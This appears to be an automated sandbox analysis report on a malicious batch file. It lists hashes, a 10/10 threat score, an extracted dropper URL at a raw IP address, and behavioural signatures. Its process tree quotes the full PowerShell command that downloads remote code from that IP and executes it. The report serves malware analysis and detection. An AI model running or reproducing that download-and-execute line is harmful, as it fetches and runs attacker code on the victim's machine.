Analysis
-
max time kernel
103s -
max time network
155s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
16-03-2020 15:10
Static task
static1
Behavioral task
behavioral1
Sample
ePwu3qhG.bat
Resource
win7v200217
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
ePwu3qhG.bat
Resource
win10v200217
windows10_x64
0 signatures
0 seconds
General
-
Target
ePwu3qhG.bat
-
Size
195B
-
MD5
aaa7b25a5b6939e0c9f77a1d8c141ff1
-
SHA1
9a68e6ebd88ee65a64c80eabd25057e8b1f7a0c3
-
SHA256
d03a1ed079e497d770b0661e81fe675fe379107ec06f75ce916466d2026b9310
-
SHA512
bc6ac64ddfeeed68bb844d913716f47f951b488d2a509993e73202577b72b129d4c725baeb5fc5bf191c97a4cb8b90d319ed23b8c9056eeb9d9d5d34acd0976e
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/ePwu3qhG
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3556 3920 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3556 WerFault.exe Token: SeBackupPrivilege 3556 WerFault.exe Token: SeDebugPrivilege 3556 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3556 WerFault.exe 3556 WerFault.exe 3556 WerFault.exe 3556 WerFault.exe 3556 WerFault.exe 3556 WerFault.exe 3556 WerFault.exe 3556 WerFault.exe 3556 WerFault.exe 3556 WerFault.exe 3556 WerFault.exe 3556 WerFault.exe 3556 WerFault.exe 3556 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ePwu3qhG.bat"1⤵PID:3952
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ePwu3qhG');Invoke-HKEJEPZNRMGY;Start-Sleep -s 10000"2⤵PID:3920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3920 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3556